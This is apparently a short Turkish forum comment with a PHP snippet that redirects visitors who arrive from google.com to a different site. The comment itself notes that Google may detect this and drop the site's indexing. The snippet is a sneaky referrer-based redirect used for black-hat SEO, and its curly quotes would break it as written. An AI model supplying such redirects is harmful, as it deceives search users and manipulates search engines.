Bu kod işini görür heralde. Ama google bunu anlar ve indexlerini silebilir

$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ref, 'google.com') !== FALSE) {
header(“Location: yonleneceksite.com”); }